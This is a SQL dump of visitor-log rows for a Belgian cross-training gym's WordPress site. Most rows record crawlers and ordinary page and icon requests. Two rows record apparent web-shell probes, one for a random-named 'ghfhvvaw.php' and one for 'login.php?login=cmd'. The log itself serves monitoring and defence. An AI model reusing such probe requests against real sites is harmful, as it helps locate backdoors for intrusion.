(73265, 1495307446.262908, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73266, 1495314333.848128, 2637637494, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(73267, 1495314334.038893, 2637637494, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(73268, 1495328759.843609, 1123631630, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73269, 1495328760.312325, 1123631630, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73270, 1495340166.822128, 621375790, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(73271, 1495340170.327309, 2366148113, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(73272, 1495350904.048785, 3024883481, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(73273, 1495357656.608115, 2637637401, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(73274, 1495357657.194998, 2637637401, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(73275, 1495361516.165220, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(73276, 1495361516.970241, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73277, 1495361517.507067, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73278, 1495361517.960242, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73279, 1495361518.413742, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73280, 1495361518.850575, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73281, 1495361519.396144, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73282, 1495361519.817903, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73283, 1495361520.259793, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73284, 1495361520.703291, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73285, 1495361521.490915, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73286, 1495367075.455518, 1123631630, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73287, 1495370677.989655, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(73288, 1495370678.673820, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73289, 1495370679.206775, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73290, 1495370679.642518, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73291, 1495370680.098841, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73292, 1495370680.534459, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73293, 1495370681.074166, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73294, 1495370681.520197, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73295, 1495370681.965142, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73296, 1495370682.393231, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73297, 1495370682.802339, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73298, 1495371654.288756, 3024883476, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(73299, 1495377472.997223, 1094179366, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0;  Trident/5.0)'),
(73300, 1495380845.272850, 1952643501, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/ghfhvvaw.php', 'http://crosstrainingcenter.be/ghfhvvaw.php', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(73301, 1495381464.838910, 1123631693, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73302, 1495381465.375105, 1123631693, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73303, 1495384169.699979, 3657086469, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(73304, 1495387052.572205, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko)'),
(73305, 1495387053.342780, 1374841142, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73306, 1495387054.047457, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73307, 1495387054.467660, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73308, 1495387054.932400, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73309, 1495387055.350763, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73310, 1495387055.816425, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73311, 1495387057.118365, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(73312, 1495387057.517003, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73313, 1495387057.934222, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73314, 1495387058.345896, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73315, 1495387058.861868, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73316, 1495387059.310413, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73317, 1495387059.827702, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73318, 1495390656.898070, 1538654468, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) GSA/25.0.152548370 Mobile/14E304 Safari/602.1'),
(73319, 1495391051.026516, 1439301535, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/16.0.124986583 Mobile/13F69 Safari/600.1.4'),
(73320, 1495391069.391760, 1439301535, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/16.0.124986583 Mobile/13F69 Safari/600.1.4'),
(73321, 1495391086.555353, 1439301535, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/16.0.124986583 Mobile/13F69 Safari/600.1.4'),
(73322, 1495400934.549346, 2637637396, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(73323, 1495403423.171683, 3657086469, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(73324, 1495407847.709389, 2328173131, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(73325, 1495407852.692547, 2328173131, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(73326, 1495407854.318326, 2328173131, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(73327, 1495407857.580263, 2328173131, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(73328, 1495407863.422815, 2328173131, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(73329, 1495407872.073777, 2328173131, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', 'http://www.crosstrainingcenter.be/?page_id=266', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(73330, 1495407877.532569, 2328173131, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(73331, 1495407882.443467, 2328173131, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(73332, 1495407887.199706, 2328173131, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(73333, 1495412680.536398, 1123631732, 0, 0, 1, 0, 1, 'https://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73334, 1495412681.176561, 1123631732, 0, 1, 1, 0, 1, 'https://www.crosstrainingcenter.be/.well-known/apple-app-site-association', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73335, 1495412758.384367, 3657086469, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(73336, 1495412912.027412, 2637637424, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(73337, 1495422910.963483, 1123631693, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73338, 1495422911.444359, 1123631693, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73339, 1495426554.680089, 3657084349, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(73340, 1495429086.072923, 3657084349, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(73341, 1495432355.607227, 3657084349, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(73342, 1495434787.479011, 1123631693, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73343, 1495437285.729437, 3657084349, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(73344, 1495438182.750391, 3267064321, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.google.be/url?sa=t&rct=j&q=&esrc=s&source=web&cd=17&ved=0ahUKEwjz_5Or_YLUAhXGJFAKHZBfA5sQ_BcIiwEwEA&url=http%3A%2F%2Fwww.crosstrainingcenter.be%2F&usg=AFQjCNFlnF2lMOWCGxV4AnRa451d2QSVkQ', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(73345, 1495438185.247433, 3267064321, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko'),
(73346, 1495439377.455801, 1123631693, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73347, 1495441249.809547, 1427844213, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(73348, 1495441256.985352, 1427844213, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(73349, 1495441535.390905, 3003111232, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)'),
(73350, 1495441538.439125, 3003111232, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)'),
(73351, 1495441582.132218, 3003111232, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/feed/', '', 'Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)'),
(73352, 1495441584.224357, 3003111232, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/feed/', '', 'Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)'),
(73353, 1495444229.816788, 2637637538, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(73354, 1495445918.012133, 3657084349, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(73355, 1495446711.841440, 1123631816, 0, 0, 1, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73356, 1495446712.888884, 1123631693, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73357, 1495447673.125838, 3495879255, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', '=Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16'),
(73358, 1495447900.043770, 2499535434, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'AwarioRssBot/1.0 (+https://awario.com/bots.html; bots@awario.com)'),
(73359, 1495447900.564393, 2499535434, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/comments/feed/', '', 'AwarioRssBot/1.0 (+https://awario.com/bots.html; bots@awario.com)'),
(73360, 1495448003.652737, 3242976508, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.google.be/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjl3-T2oYPUAhUGAsAKHRsvCLwQFggjMAA&url=http%3A%2F%2Fwww.crosstrainingcenter.be%2F&usg=AFQjCNFlnF2lMOWCGxV4AnRa451d2QSVkQ', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(73361, 1495450284.762171, 1538458305, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'android-app://com.google.android.googlequicksearchbox', 'Mozilla/5.0 (Linux; Android 7.0; SM-G925F Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.83 Mobile Safari/537.36'),
(73362, 1495450286.842181, 1538458305, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Linux; Android 7.0; SM-G925F Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.83 Mobile Safari/537.36'),
(73363, 1495452048.125661, 1123631693, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73364, 1495455231.840738, 1123631693, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73365, 1495456405.038537, 1538512707, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(73366, 1495456406.547277, 1538512707, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(73367, 1495456423.633050, 1538512707, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/266-2/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(73368, 1495457952.399407, 3166481419, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.1 Safari/603.1.30'),
(73369, 1495457953.925400, 3166481419, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.1 Safari/603.1.30'),
(73370, 1495457953.935821, 3166481419, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/10603.1.30.0.34 CFNetwork/720.5.7 Darwin/14.5.0 (x86_64)'),
(73371, 1495457954.430503, 3166481419, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/10603.1.30.0.34 CFNetwork/720.5.7 Darwin/14.5.0 (x86_64)'),
(73372, 1495459211.253032, 1123631693, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73373, 1495463012.006675, 2644818889, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0'),
(73374, 1495463013.016947, 2644818889, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0'),
(73375, 1495469341.090708, 1123633622, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Googlebot-Image/1.0'),
(73376, 1495469341.730174, 1123633622, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Googlebot-Image/1.0'),
(73377, 1495472192.508062, 2745986199, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/login.php?login=cmd', 'http://www.crosstrainingcenter.be/login.php?login=cmd', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36'),
(73378, 1495477972.802826, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(73379, 1495477973.758649, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73380, 1495477974.365173, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73381, 1495477974.894613, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73382, 1495477975.349587, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73383, 1495477975.870913, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
